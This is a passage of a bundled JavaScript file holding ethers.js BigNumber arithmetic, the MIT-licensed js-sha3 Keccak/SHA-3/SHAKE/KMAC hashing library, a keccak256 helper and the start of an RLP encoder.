        const value = $0df4577496dcf693$var$toBN(other);
        if (this.isNegative() || value.isNeg()) $0df4577496dcf693$var$throwFault("unbound-bitwise-result", "and");
        return $0df4577496dcf693$var$toBigNumber($0df4577496dcf693$var$toBN(this).and(value));
    }
    or(other) {
        const value = $0df4577496dcf693$var$toBN(other);
        if (this.isNegative() || value.isNeg()) $0df4577496dcf693$var$throwFault("unbound-bitwise-result", "or");
        return $0df4577496dcf693$var$toBigNumber($0df4577496dcf693$var$toBN(this).or(value));
    }
    xor(other) {
        const value = $0df4577496dcf693$var$toBN(other);
        if (this.isNegative() || value.isNeg()) $0df4577496dcf693$var$throwFault("unbound-bitwise-result", "xor");
        return $0df4577496dcf693$var$toBigNumber($0df4577496dcf693$var$toBN(this).xor(value));
    }
    mask(value) {
        if (this.isNegative() || value < 0) $0df4577496dcf693$var$throwFault("negative-width", "mask");
        return $0df4577496dcf693$var$toBigNumber($0df4577496dcf693$var$toBN(this).maskn(value));
    }
    shl(value) {
        if (this.isNegative() || value < 0) $0df4577496dcf693$var$throwFault("negative-width", "shl");
        return $0df4577496dcf693$var$toBigNumber($0df4577496dcf693$var$toBN(this).shln(value));
    }
    shr(value) {
        if (this.isNegative() || value < 0) $0df4577496dcf693$var$throwFault("negative-width", "shr");
        return $0df4577496dcf693$var$toBigNumber($0df4577496dcf693$var$toBN(this).shrn(value));
    }
    eq(other) {
        return $0df4577496dcf693$var$toBN(this).eq($0df4577496dcf693$var$toBN(other));
    }
    lt(other) {
        return $0df4577496dcf693$var$toBN(this).lt($0df4577496dcf693$var$toBN(other));
    }
    lte(other) {
        return $0df4577496dcf693$var$toBN(this).lte($0df4577496dcf693$var$toBN(other));
    }
    gt(other) {
        return $0df4577496dcf693$var$toBN(this).gt($0df4577496dcf693$var$toBN(other));
    }
    gte(other) {
        return $0df4577496dcf693$var$toBN(this).gte($0df4577496dcf693$var$toBN(other));
    }
    isNegative() {
        return this._hex[0] === "-";
    }
    isZero() {
        return $0df4577496dcf693$var$toBN(this).isZero();
    }
    toNumber() {
        try {
            return $0df4577496dcf693$var$toBN(this).toNumber();
        } catch (error) {
            $0df4577496dcf693$var$throwFault("overflow", "toNumber", this.toString());
        }
        return null;
    }
    toBigInt() {
        try {
            return BigInt(this.toString());
        } catch (e) {}
        return $0df4577496dcf693$var$logger.throwError("this platform does not support BigInt", (0, $97a8d5981d597bb7$export$efa9a398d6368992).errors.UNSUPPORTED_OPERATION, {
            value: this.toString()
        });
    }
    toString() {
        // Lots of people expect this, which we do not support, so check (See: #889)
        if (arguments.length > 0) {
            if (arguments[0] === 10) {
                if (!$0df4577496dcf693$var$_warnedToStringRadix) {
                    $0df4577496dcf693$var$_warnedToStringRadix = true;
                    $0df4577496dcf693$var$logger.warn("BigNumber.toString does not accept any parameters; base-10 is assumed");
                }
            } else if (arguments[0] === 16) $0df4577496dcf693$var$logger.throwError("BigNumber.toString does not accept any parameters; use bigNumber.toHexString()", (0, $97a8d5981d597bb7$export$efa9a398d6368992).errors.UNEXPECTED_ARGUMENT, {});
            else $0df4577496dcf693$var$logger.throwError("BigNumber.toString does not accept parameters", (0, $97a8d5981d597bb7$export$efa9a398d6368992).errors.UNEXPECTED_ARGUMENT, {});
        }
        return $0df4577496dcf693$var$toBN(this).toString(10);
    }
    toHexString() {
        return this._hex;
    }
    toJSON(key) {
        return {
            type: "BigNumber",
            hex: this.toHexString()
        };
    }
    static from(value) {
        if (value instanceof $0df4577496dcf693$export$d97aa349ed20696) return value;
        if (typeof value === "string") {
            if (value.match(/^-?0x[0-9a-f]+$/i)) return new $0df4577496dcf693$export$d97aa349ed20696($0df4577496dcf693$var$_constructorGuard, $0df4577496dcf693$var$toHex(value));
            if (value.match(/^-?[0-9]+$/)) return new $0df4577496dcf693$export$d97aa349ed20696($0df4577496dcf693$var$_constructorGuard, $0df4577496dcf693$var$toHex(new $0df4577496dcf693$var$BN(value)));
            return $0df4577496dcf693$var$logger.throwArgumentError("invalid BigNumber string", "value", value);
        }
        if (typeof value === "number") {
            if (value % 1) $0df4577496dcf693$var$throwFault("underflow", "BigNumber.from", value);
            if (value >= $0df4577496dcf693$var$MAX_SAFE || value <= -$0df4577496dcf693$var$MAX_SAFE) $0df4577496dcf693$var$throwFault("overflow", "BigNumber.from", value);
            return $0df4577496dcf693$export$d97aa349ed20696.from(String(value));
        }
        const anyValue = value;
        if (typeof anyValue === "bigint") return $0df4577496dcf693$export$d97aa349ed20696.from(anyValue.toString());
        if ((0, $7b88b6e03e4708f2$export$c6fabfbfd097fc30)(anyValue)) return $0df4577496dcf693$export$d97aa349ed20696.from((0, $7b88b6e03e4708f2$export$2b0d6b5fbe698c70)(anyValue));
        if (anyValue) {
            // Hexable interface (takes priority)
            if (anyValue.toHexString) {
                const hex = anyValue.toHexString();
                if (typeof hex === "string") return $0df4577496dcf693$export$d97aa349ed20696.from(hex);
            } else {
                // For now, handle legacy JSON-ified values (goes away in v6)
                let hex = anyValue._hex;
                // New-form JSON
                if (hex == null && anyValue.type === "BigNumber") hex = anyValue.hex;
                if (typeof hex === "string") {
                    if ((0, $7b88b6e03e4708f2$export$b02a40aff8e4ad18)(hex) || hex[0] === "-" && (0, $7b88b6e03e4708f2$export$b02a40aff8e4ad18)(hex.substring(1))) return $0df4577496dcf693$export$d97aa349ed20696.from(hex);
                }
            }
        }
        return $0df4577496dcf693$var$logger.throwArgumentError("invalid BigNumber value", "value", value);
    }
    static isBigNumber(value) {
        return !!(value && value._isBigNumber);
    }
}
// Normalize the hex string
function $0df4577496dcf693$var$toHex(value) {
    // For BN, call on the hex string
    if (typeof value !== "string") return $0df4577496dcf693$var$toHex(value.toString(16));
    // If negative, prepend the negative sign to the normalized positive value
    if (value[0] === "-") {
        // Strip off the negative sign
        value = value.substring(1);
        // Cannot have multiple negative signs (e.g. "--0x04")
        if (value[0] === "-") $0df4577496dcf693$var$logger.throwArgumentError("invalid hex", "value", value);
        // Call toHex on the positive component
        value = $0df4577496dcf693$var$toHex(value);
        // Do not allow "-0x00"
        if (value === "0x00") return value;
        // Negate the value
        return "-" + value;
    }
    // Add a "0x" prefix if missing
    if (value.substring(0, 2) !== "0x") value = "0x" + value;
    // Normalize zero
    if (value === "0x") return "0x00";
    // Make the string even length
    if (value.length % 2) value = "0x0" + value.substring(2);
    // Trim to smallest even-length string
    while(value.length > 4 && value.substring(0, 4) === "0x00")value = "0x" + value.substring(4);
    return value;
}
function $0df4577496dcf693$var$toBigNumber(value) {
    return $0df4577496dcf693$export$d97aa349ed20696.from($0df4577496dcf693$var$toHex(value));
}
function $0df4577496dcf693$var$toBN(value) {
    const hex = $0df4577496dcf693$export$d97aa349ed20696.from(value).toHexString();
    if (hex[0] === "-") return new $0df4577496dcf693$var$BN("-" + hex.substring(3), 16);
    return new $0df4577496dcf693$var$BN(hex.substring(2), 16);
}
function $0df4577496dcf693$var$throwFault(fault, operation, value) {
    const params = {
        fault: fault,
        operation: operation
    };
    if (value != null) params.value = value;
    return $0df4577496dcf693$var$logger.throwError(fault, (0, $97a8d5981d597bb7$export$efa9a398d6368992).errors.NUMERIC_FAULT, params);
}
function $0df4577496dcf693$export$51e4a08295f7770f(value) {
    return new $0df4577496dcf693$var$BN(value, 36).toString(16);
}
function $0df4577496dcf693$export$1293db5d29c264ff(value) {
    return new $0df4577496dcf693$var$BN(value, 16).toString(36);
}


var $140ac3b566c7a94d$exports = {};

var $hPtJY = parcelRequire("hPtJY");
/**
 * [js-sha3]{@link https://github.com/emn178/js-sha3}
 *
 * @version 0.8.0
 * @author Chen, Yi-Cyuan [emn178@gmail.com]
 * @copyright Chen, Yi-Cyuan 2015-2018
 * @license MIT
 */ /*jslint bitwise: true */ (function() {
    "use strict";
    var INPUT_ERROR = "input is invalid type";
    var FINALIZE_ERROR = "finalize already called";
    var WINDOW = typeof window === "object";
    var root = WINDOW ? window : {};
    if (root.JS_SHA3_NO_WINDOW) WINDOW = false;
    var WEB_WORKER = !WINDOW && typeof self === "object";
    var NODE_JS = !root.JS_SHA3_NO_NODE_JS && typeof $hPtJY === "object" && $hPtJY.versions && $hPtJY.versions.node;
    if (NODE_JS) root = $parcel$global;
    else if (WEB_WORKER) root = self;
    var COMMON_JS = !root.JS_SHA3_NO_COMMON_JS && true && $140ac3b566c7a94d$exports;
    var AMD = typeof define === "function" && define.amd;
    var ARRAY_BUFFER = !root.JS_SHA3_NO_ARRAY_BUFFER && typeof ArrayBuffer !== "undefined";
    var HEX_CHARS = "0123456789abcdef".split("");
    var SHAKE_PADDING = [
        31,
        7936,
        2031616,
        520093696
    ];
    var CSHAKE_PADDING = [
        4,
        1024,
        262144,
        67108864
    ];
    var KECCAK_PADDING = [
        1,
        256,
        65536,
        16777216
    ];
    var PADDING = [
        6,
        1536,
        393216,
        100663296
    ];
    var SHIFT = [
        0,
        8,
        16,
        24
    ];
    var RC = [
        1,
        0,
        32898,
        0,
        32906,
        2147483648,
        2147516416,
        2147483648,
        32907,
        0,
        2147483649,
        0,
        2147516545,
        2147483648,
        32777,
        2147483648,
        138,
        0,
        136,
        0,
        2147516425,
        0,
        2147483658,
        0,
        2147516555,
        0,
        139,
        2147483648,
        32905,
        2147483648,
        32771,
        2147483648,
        32770,
        2147483648,
        128,
        2147483648,
        32778,
        0,
        2147483658,
        2147483648,
        2147516545,
        2147483648,
        32896,
        2147483648,
        2147483649,
        0,
        2147516424,
        2147483648
    ];
    var BITS = [
        224,
        256,
        384,
        512
    ];
    var SHAKE_BITS = [
        128,
        256
    ];
    var OUTPUT_TYPES = [
        "hex",
        "buffer",
        "arrayBuffer",
        "array",
        "digest"
    ];
    var CSHAKE_BYTEPAD = {
        "128": 168,
        "256": 136
    };
    if (root.JS_SHA3_NO_NODE_JS || !Array.isArray) Array.isArray = function(obj) {
        return Object.prototype.toString.call(obj) === "[object Array]";
    };
    if (ARRAY_BUFFER && (root.JS_SHA3_NO_ARRAY_BUFFER_IS_VIEW || !ArrayBuffer.isView)) ArrayBuffer.isView = function(obj) {
        return typeof obj === "object" && obj.buffer && obj.buffer.constructor === ArrayBuffer;
    };
    var createOutputMethod = function(bits, padding, outputType) {
        return function(message) {
            return new Keccak(bits, padding, bits).update(message)[outputType]();
        };
    };
    var createShakeOutputMethod = function(bits, padding, outputType) {
        return function(message, outputBits) {
            return new Keccak(bits, padding, outputBits).update(message)[outputType]();
        };
    };
    var createCshakeOutputMethod = function(bits, padding, outputType) {
        return function(message, outputBits, n, s) {
            return methods["cshake" + bits].update(message, outputBits, n, s)[outputType]();
        };
    };
    var createKmacOutputMethod = function(bits, padding, outputType) {
        return function(key, message, outputBits, s) {
            return methods["kmac" + bits].update(key, message, outputBits, s)[outputType]();
        };
    };
    var createOutputMethods = function(method, createMethod, bits, padding) {
        for(var i = 0; i < OUTPUT_TYPES.length; ++i){
            var type = OUTPUT_TYPES[i];
            method[type] = createMethod(bits, padding, type);
        }
        return method;
    };
    var createMethod = function(bits, padding) {
        var method = createOutputMethod(bits, padding, "hex");
        method.create = function() {
            return new Keccak(bits, padding, bits);
        };
        method.update = function(message) {
            return method.create().update(message);
        };
        return createOutputMethods(method, createOutputMethod, bits, padding);
    };
    var createShakeMethod = function(bits, padding) {
        var method = createShakeOutputMethod(bits, padding, "hex");
        method.create = function(outputBits) {
            return new Keccak(bits, padding, outputBits);
        };
        method.update = function(message, outputBits) {
            return method.create(outputBits).update(message);
        };
        return createOutputMethods(method, createShakeOutputMethod, bits, padding);
    };
    var createCshakeMethod = function(bits, padding) {
        var w = CSHAKE_BYTEPAD[bits];
        var method = createCshakeOutputMethod(bits, padding, "hex");
        method.create = function(outputBits, n, s) {
            if (!n && !s) return methods["shake" + bits].create(outputBits);
            else return new Keccak(bits, padding, outputBits).bytepad([
                n,
                s
            ], w);
        };
        method.update = function(message, outputBits, n, s) {
            return method.create(outputBits, n, s).update(message);
        };
        return createOutputMethods(method, createCshakeOutputMethod, bits, padding);
    };
    var createKmacMethod = function(bits, padding) {
        var w = CSHAKE_BYTEPAD[bits];
        var method = createKmacOutputMethod(bits, padding, "hex");
        method.create = function(key, outputBits, s) {
            return new Kmac(bits, padding, outputBits).bytepad([
                "KMAC",
                s
            ], w).bytepad([
                key
            ], w);
        };
        method.update = function(key, message, outputBits, s) {
            return method.create(key, outputBits, s).update(message);
        };
        return createOutputMethods(method, createKmacOutputMethod, bits, padding);
    };
    var algorithms = [
        {
            name: "keccak",
            padding: KECCAK_PADDING,
            bits: BITS,
            createMethod: createMethod
        },
        {
            name: "sha3",
            padding: PADDING,
            bits: BITS,
            createMethod: createMethod
        },
        {
            name: "shake",
            padding: SHAKE_PADDING,
            bits: SHAKE_BITS,
            createMethod: createShakeMethod
        },
        {
            name: "cshake",
            padding: CSHAKE_PADDING,
            bits: SHAKE_BITS,
            createMethod: createCshakeMethod
        },
        {
            name: "kmac",
            padding: CSHAKE_PADDING,
            bits: SHAKE_BITS,
            createMethod: createKmacMethod
        }
    ];
    var methods = {}, methodNames = [];
    for(var i = 0; i < algorithms.length; ++i){
        var algorithm = algorithms[i];
        var bits = algorithm.bits;
        for(var j = 0; j < bits.length; ++j){
            var methodName = algorithm.name + "_" + bits[j];
            methodNames.push(methodName);
            methods[methodName] = algorithm.createMethod(bits[j], algorithm.padding);
            if (algorithm.name !== "sha3") {
                var newMethodName = algorithm.name + bits[j];
                methodNames.push(newMethodName);
                methods[newMethodName] = methods[methodName];
            }
        }
    }
    function Keccak(bits, padding, outputBits) {
        this.blocks = [];
        this.s = [];
        this.padding = padding;
        this.outputBits = outputBits;
        this.reset = true;
        this.finalized = false;
        this.block = 0;
        this.start = 0;
        this.blockCount = 1600 - (bits << 1) >> 5;
        this.byteCount = this.blockCount << 2;
        this.outputBlocks = outputBits >> 5;
        this.extraBytes = (outputBits & 31) >> 3;
        for(var i = 0; i < 50; ++i)this.s[i] = 0;
    }
    Keccak.prototype.update = function(message) {
        if (this.finalized) throw new Error(FINALIZE_ERROR);
        var notString, type = typeof message;
        if (type !== "string") {
            if (type === "object") {
                if (message === null) throw new Error(INPUT_ERROR);
                else if (ARRAY_BUFFER && message.constructor === ArrayBuffer) message = new Uint8Array(message);
                else if (!Array.isArray(message)) {
                    if (!ARRAY_BUFFER || !ArrayBuffer.isView(message)) throw new Error(INPUT_ERROR);
                }
            } else throw new Error(INPUT_ERROR);
            notString = true;
        }
        var blocks = this.blocks, byteCount = this.byteCount, length = message.length, blockCount = this.blockCount, index = 0, s = this.s, i, code;
        while(index < length){
            if (this.reset) {
                this.reset = false;
                blocks[0] = this.block;
                for(i = 1; i < blockCount + 1; ++i)blocks[i] = 0;
            }
            if (notString) for(i = this.start; index < length && i < byteCount; ++index)blocks[i >> 2] |= message[index] << SHIFT[i++ & 3];
            else for(i = this.start; index < length && i < byteCount; ++index){
                code = message.charCodeAt(index);
                if (code < 0x80) blocks[i >> 2] |= code << SHIFT[i++ & 3];
                else if (code < 0x800) {
                    blocks[i >> 2] |= (0xc0 | code >> 6) << SHIFT[i++ & 3];
                    blocks[i >> 2] |= (0x80 | code & 0x3f) << SHIFT[i++ & 3];
                } else if (code < 0xd800 || code >= 0xe000) {
                    blocks[i >> 2] |= (0xe0 | code >> 12) << SHIFT[i++ & 3];
                    blocks[i >> 2] |= (0x80 | code >> 6 & 0x3f) << SHIFT[i++ & 3];
                    blocks[i >> 2] |= (0x80 | code & 0x3f) << SHIFT[i++ & 3];
                } else {
                    code = 0x10000 + ((code & 0x3ff) << 10 | message.charCodeAt(++index) & 0x3ff);
                    blocks[i >> 2] |= (0xf0 | code >> 18) << SHIFT[i++ & 3];
                    blocks[i >> 2] |= (0x80 | code >> 12 & 0x3f) << SHIFT[i++ & 3];
                    blocks[i >> 2] |= (0x80 | code >> 6 & 0x3f) << SHIFT[i++ & 3];
                    blocks[i >> 2] |= (0x80 | code & 0x3f) << SHIFT[i++ & 3];
                }
            }
            this.lastByteIndex = i;
            if (i >= byteCount) {
                this.start = i - byteCount;
                this.block = blocks[blockCount];
                for(i = 0; i < blockCount; ++i)s[i] ^= blocks[i];
                f(s);
                this.reset = true;
            } else this.start = i;
        }
        return this;
    };
    Keccak.prototype.encode = function(x, right) {
        var o = x & 255, n = 1;
        var bytes = [
            o
        ];
        x = x >> 8;
        o = x & 255;
        while(o > 0){
            bytes.unshift(o);
            x = x >> 8;
            o = x & 255;
            ++n;
        }
        if (right) bytes.push(n);
        else bytes.unshift(n);
        this.update(bytes);
        return bytes.length;
    };
    Keccak.prototype.encodeString = function(str) {
        var notString, type = typeof str;
        if (type !== "string") {
            if (type === "object") {
                if (str === null) throw new Error(INPUT_ERROR);
                else if (ARRAY_BUFFER && str.constructor === ArrayBuffer) str = new Uint8Array(str);
                else if (!Array.isArray(str)) {
                    if (!ARRAY_BUFFER || !ArrayBuffer.isView(str)) throw new Error(INPUT_ERROR);
                }
            } else throw new Error(INPUT_ERROR);
            notString = true;
        }
        var bytes = 0, length = str.length;
        if (notString) bytes = length;
        else for(var i = 0; i < str.length; ++i){
            var code = str.charCodeAt(i);
            if (code < 0x80) bytes += 1;
            else if (code < 0x800) bytes += 2;
            else if (code < 0xd800 || code >= 0xe000) bytes += 3;
            else {
                code = 0x10000 + ((code & 0x3ff) << 10 | str.charCodeAt(++i) & 0x3ff);
                bytes += 4;
            }
        }
        bytes += this.encode(bytes * 8);
        this.update(str);
        return bytes;
    };
    Keccak.prototype.bytepad = function(strs, w) {
        var bytes = this.encode(w);
        for(var i = 0; i < strs.length; ++i)bytes += this.encodeString(strs[i]);
        var paddingBytes = w - bytes % w;
        var zeros = [];
        zeros.length = paddingBytes;
        this.update(zeros);
        return this;
    };
    Keccak.prototype.finalize = function() {
        if (this.finalized) return;
        this.finalized = true;
        var blocks = this.blocks, i = this.lastByteIndex, blockCount = this.blockCount, s = this.s;
        blocks[i >> 2] |= this.padding[i & 3];
        if (this.lastByteIndex === this.byteCount) {
            blocks[0] = blocks[blockCount];
            for(i = 1; i < blockCount + 1; ++i)blocks[i] = 0;
        }
        blocks[blockCount - 1] |= 0x80000000;
        for(i = 0; i < blockCount; ++i)s[i] ^= blocks[i];
        f(s);
    };
    Keccak.prototype.toString = Keccak.prototype.hex = function() {
        this.finalize();
        var blockCount = this.blockCount, s = this.s, outputBlocks = this.outputBlocks, extraBytes = this.extraBytes, i = 0, j = 0;
        var hex = "", block;
        while(j < outputBlocks){
            for(i = 0; i < blockCount && j < outputBlocks; ++i, ++j){
                block = s[i];
                hex += HEX_CHARS[block >> 4 & 0x0F] + HEX_CHARS[block & 0x0F] + HEX_CHARS[block >> 12 & 0x0F] + HEX_CHARS[block >> 8 & 0x0F] + HEX_CHARS[block >> 20 & 0x0F] + HEX_CHARS[block >> 16 & 0x0F] + HEX_CHARS[block >> 28 & 0x0F] + HEX_CHARS[block >> 24 & 0x0F];
            }
            if (j % blockCount === 0) {
                f(s);
                i = 0;
            }
        }
        if (extraBytes) {
            block = s[i];
            hex += HEX_CHARS[block >> 4 & 0x0F] + HEX_CHARS[block & 0x0F];
            if (extraBytes > 1) hex += HEX_CHARS[block >> 12 & 0x0F] + HEX_CHARS[block >> 8 & 0x0F];
            if (extraBytes > 2) hex += HEX_CHARS[block >> 20 & 0x0F] + HEX_CHARS[block >> 16 & 0x0F];
        }
        return hex;
    };
    Keccak.prototype.arrayBuffer = function() {
        this.finalize();
        var blockCount = this.blockCount, s = this.s, outputBlocks = this.outputBlocks, extraBytes = this.extraBytes, i = 0, j = 0;
        var bytes = this.outputBits >> 3;
        var buffer;
        if (extraBytes) buffer = new ArrayBuffer(outputBlocks + 1 << 2);
        else buffer = new ArrayBuffer(bytes);
        var array = new Uint32Array(buffer);
        while(j < outputBlocks){
            for(i = 0; i < blockCount && j < outputBlocks; ++i, ++j)array[j] = s[i];
            if (j % blockCount === 0) f(s);
        }
        if (extraBytes) {
            array[i] = s[i];
            buffer = buffer.slice(0, bytes);
        }
        return buffer;
    };
    Keccak.prototype.buffer = Keccak.prototype.arrayBuffer;
    Keccak.prototype.digest = Keccak.prototype.array = function() {
        this.finalize();
        var blockCount = this.blockCount, s = this.s, outputBlocks = this.outputBlocks, extraBytes = this.extraBytes, i = 0, j = 0;
        var array = [], offset, block;
        while(j < outputBlocks){
            for(i = 0; i < blockCount && j < outputBlocks; ++i, ++j){
                offset = j << 2;
                block = s[i];
                array[offset] = block & 0xFF;
                array[offset + 1] = block >> 8 & 0xFF;
                array[offset + 2] = block >> 16 & 0xFF;
                array[offset + 3] = block >> 24 & 0xFF;
            }
            if (j % blockCount === 0) f(s);
        }
        if (extraBytes) {
            offset = j << 2;
            block = s[i];
            array[offset] = block & 0xFF;
            if (extraBytes > 1) array[offset + 1] = block >> 8 & 0xFF;
            if (extraBytes > 2) array[offset + 2] = block >> 16 & 0xFF;
        }
        return array;
    };
    function Kmac(bits, padding, outputBits) {
        Keccak.call(this, bits, padding, outputBits);
    }
    Kmac.prototype = new Keccak();
    Kmac.prototype.finalize = function() {
        this.encode(this.outputBits, true);
        return Keccak.prototype.finalize.call(this);
    };
    var f = function(s) {
        var h, l, n, c0, c1, c2, c3, c4, c5, c6, c7, c8, c9, b0, b1, b2, b3, b4, b5, b6, b7, b8, b9, b10, b11, b12, b13, b14, b15, b16, b17, b18, b19, b20, b21, b22, b23, b24, b25, b26, b27, b28, b29, b30, b31, b32, b33, b34, b35, b36, b37, b38, b39, b40, b41, b42, b43, b44, b45, b46, b47, b48, b49;
        for(n = 0; n < 48; n += 2){
            c0 = s[0] ^ s[10] ^ s[20] ^ s[30] ^ s[40];
            c1 = s[1] ^ s[11] ^ s[21] ^ s[31] ^ s[41];
            c2 = s[2] ^ s[12] ^ s[22] ^ s[32] ^ s[42];
            c3 = s[3] ^ s[13] ^ s[23] ^ s[33] ^ s[43];
            c4 = s[4] ^ s[14] ^ s[24] ^ s[34] ^ s[44];
            c5 = s[5] ^ s[15] ^ s[25] ^ s[35] ^ s[45];
            c6 = s[6] ^ s[16] ^ s[26] ^ s[36] ^ s[46];
            c7 = s[7] ^ s[17] ^ s[27] ^ s[37] ^ s[47];
            c8 = s[8] ^ s[18] ^ s[28] ^ s[38] ^ s[48];
            c9 = s[9] ^ s[19] ^ s[29] ^ s[39] ^ s[49];
            h = c8 ^ (c2 << 1 | c3 >>> 31);
            l = c9 ^ (c3 << 1 | c2 >>> 31);
            s[0] ^= h;
            s[1] ^= l;
            s[10] ^= h;
            s[11] ^= l;
            s[20] ^= h;
            s[21] ^= l;
            s[30] ^= h;
            s[31] ^= l;
            s[40] ^= h;
            s[41] ^= l;
            h = c0 ^ (c4 << 1 | c5 >>> 31);
            l = c1 ^ (c5 << 1 | c4 >>> 31);
            s[2] ^= h;
            s[3] ^= l;
            s[12] ^= h;
            s[13] ^= l;
            s[22] ^= h;
            s[23] ^= l;
            s[32] ^= h;
            s[33] ^= l;
            s[42] ^= h;
            s[43] ^= l;
            h = c2 ^ (c6 << 1 | c7 >>> 31);
            l = c3 ^ (c7 << 1 | c6 >>> 31);
            s[4] ^= h;
            s[5] ^= l;
            s[14] ^= h;
            s[15] ^= l;
            s[24] ^= h;
            s[25] ^= l;
            s[34] ^= h;
            s[35] ^= l;
            s[44] ^= h;
            s[45] ^= l;
            h = c4 ^ (c8 << 1 | c9 >>> 31);
            l = c5 ^ (c9 << 1 | c8 >>> 31);
            s[6] ^= h;
            s[7] ^= l;
            s[16] ^= h;
            s[17] ^= l;
            s[26] ^= h;
            s[27] ^= l;
            s[36] ^= h;
            s[37] ^= l;
            s[46] ^= h;
            s[47] ^= l;
            h = c6 ^ (c0 << 1 | c1 >>> 31);
            l = c7 ^ (c1 << 1 | c0 >>> 31);
            s[8] ^= h;
            s[9] ^= l;
            s[18] ^= h;
            s[19] ^= l;
            s[28] ^= h;
            s[29] ^= l;
            s[38] ^= h;
            s[39] ^= l;
            s[48] ^= h;
            s[49] ^= l;
            b0 = s[0];
            b1 = s[1];
            b32 = s[11] << 4 | s[10] >>> 28;
            b33 = s[10] << 4 | s[11] >>> 28;
            b14 = s[20] << 3 | s[21] >>> 29;
            b15 = s[21] << 3 | s[20] >>> 29;
            b46 = s[31] << 9 | s[30] >>> 23;
            b47 = s[30] << 9 | s[31] >>> 23;
            b28 = s[40] << 18 | s[41] >>> 14;
            b29 = s[41] << 18 | s[40] >>> 14;
            b20 = s[2] << 1 | s[3] >>> 31;
            b21 = s[3] << 1 | s[2] >>> 31;
            b2 = s[13] << 12 | s[12] >>> 20;
            b3 = s[12] << 12 | s[13] >>> 20;
            b34 = s[22] << 10 | s[23] >>> 22;
            b35 = s[23] << 10 | s[22] >>> 22;
            b16 = s[33] << 13 | s[32] >>> 19;
            b17 = s[32] << 13 | s[33] >>> 19;
            b48 = s[42] << 2 | s[43] >>> 30;
            b49 = s[43] << 2 | s[42] >>> 30;
            b40 = s[5] << 30 | s[4] >>> 2;
            b41 = s[4] << 30 | s[5] >>> 2;
            b22 = s[14] << 6 | s[15] >>> 26;
            b23 = s[15] << 6 | s[14] >>> 26;
            b4 = s[25] << 11 | s[24] >>> 21;
            b5 = s[24] << 11 | s[25] >>> 21;
            b36 = s[34] << 15 | s[35] >>> 17;
            b37 = s[35] << 15 | s[34] >>> 17;
            b18 = s[45] << 29 | s[44] >>> 3;
            b19 = s[44] << 29 | s[45] >>> 3;
            b10 = s[6] << 28 | s[7] >>> 4;
            b11 = s[7] << 28 | s[6] >>> 4;
            b42 = s[17] << 23 | s[16] >>> 9;
            b43 = s[16] << 23 | s[17] >>> 9;
            b24 = s[26] << 25 | s[27] >>> 7;
            b25 = s[27] << 25 | s[26] >>> 7;
            b6 = s[36] << 21 | s[37] >>> 11;
            b7 = s[37] << 21 | s[36] >>> 11;
            b38 = s[47] << 24 | s[46] >>> 8;
            b39 = s[46] << 24 | s[47] >>> 8;
            b30 = s[8] << 27 | s[9] >>> 5;
            b31 = s[9] << 27 | s[8] >>> 5;
            b12 = s[18] << 20 | s[19] >>> 12;
            b13 = s[19] << 20 | s[18] >>> 12;
            b44 = s[29] << 7 | s[28] >>> 25;
            b45 = s[28] << 7 | s[29] >>> 25;
            b26 = s[38] << 8 | s[39] >>> 24;
            b27 = s[39] << 8 | s[38] >>> 24;
            b8 = s[48] << 14 | s[49] >>> 18;
            b9 = s[49] << 14 | s[48] >>> 18;
            s[0] = b0 ^ ~b2 & b4;
            s[1] = b1 ^ ~b3 & b5;
            s[10] = b10 ^ ~b12 & b14;
            s[11] = b11 ^ ~b13 & b15;
            s[20] = b20 ^ ~b22 & b24;
            s[21] = b21 ^ ~b23 & b25;
            s[30] = b30 ^ ~b32 & b34;
            s[31] = b31 ^ ~b33 & b35;
            s[40] = b40 ^ ~b42 & b44;
            s[41] = b41 ^ ~b43 & b45;
            s[2] = b2 ^ ~b4 & b6;
            s[3] = b3 ^ ~b5 & b7;
            s[12] = b12 ^ ~b14 & b16;
            s[13] = b13 ^ ~b15 & b17;
            s[22] = b22 ^ ~b24 & b26;
            s[23] = b23 ^ ~b25 & b27;
            s[32] = b32 ^ ~b34 & b36;
            s[33] = b33 ^ ~b35 & b37;
            s[42] = b42 ^ ~b44 & b46;
            s[43] = b43 ^ ~b45 & b47;
            s[4] = b4 ^ ~b6 & b8;
            s[5] = b5 ^ ~b7 & b9;
            s[14] = b14 ^ ~b16 & b18;
            s[15] = b15 ^ ~b17 & b19;
            s[24] = b24 ^ ~b26 & b28;
            s[25] = b25 ^ ~b27 & b29;
            s[34] = b34 ^ ~b36 & b38;
            s[35] = b35 ^ ~b37 & b39;
            s[44] = b44 ^ ~b46 & b48;
            s[45] = b45 ^ ~b47 & b49;
            s[6] = b6 ^ ~b8 & b0;
            s[7] = b7 ^ ~b9 & b1;
            s[16] = b16 ^ ~b18 & b10;
            s[17] = b17 ^ ~b19 & b11;
            s[26] = b26 ^ ~b28 & b20;
            s[27] = b27 ^ ~b29 & b21;
            s[36] = b36 ^ ~b38 & b30;
            s[37] = b37 ^ ~b39 & b31;
            s[46] = b46 ^ ~b48 & b40;
            s[47] = b47 ^ ~b49 & b41;
            s[8] = b8 ^ ~b0 & b2;
            s[9] = b9 ^ ~b1 & b3;
            s[18] = b18 ^ ~b10 & b12;
            s[19] = b19 ^ ~b11 & b13;
            s[28] = b28 ^ ~b20 & b22;
            s[29] = b29 ^ ~b21 & b23;
            s[38] = b38 ^ ~b30 & b32;
            s[39] = b39 ^ ~b31 & b33;
            s[48] = b48 ^ ~b40 & b42;
            s[49] = b49 ^ ~b41 & b43;
            s[0] ^= RC[n];
            s[1] ^= RC[n + 1];
        }
    };
    if (COMMON_JS) $140ac3b566c7a94d$exports = methods;
    else {
        for(i = 0; i < methodNames.length; ++i)root[methodNames[i]] = methods[methodNames[i]];
        if (AMD) define(function() {
            return methods;
        });
    }
})();



"use strict";
function $1dbc6131e27af3ca$export$f8151fce47ad1c35(data) {
    return "0x" + (0, (/*@__PURE__*/$parcel$interopDefault($140ac3b566c7a94d$exports))).keccak_256((0, $7b88b6e03e4708f2$export$3131421a7d01b4fb)(data));
}




const $82765913239667f9$export$83d89fbfd8236492 = "rlp/5.7.0";


"use strict";
const $6ff2d0f6bfa15181$var$logger = new (0, $97a8d5981d597bb7$export$efa9a398d6368992)((0, $82765913239667f9$export$83d89fbfd8236492));
function $6ff2d0f6bfa15181$var$arrayifyInteger(value) {
    const result = [];
    while(value){
        result.unshift(value & 0xff);
        value >>= 8;
    }
    return result;
}
function $6ff2d0f6bfa15181$var$unarrayifyInteger(data, offset, length) {
    let result = 0;
    for(let i = 0; i < length; i++)result = result * 256 + data[offset + i];
    return result;
}
function $6ff2d0f6bfa15181$var$_encode(object) {
    if (Array.isArray(object)) {
        let payload = [];
        object.forEach(function(child) {
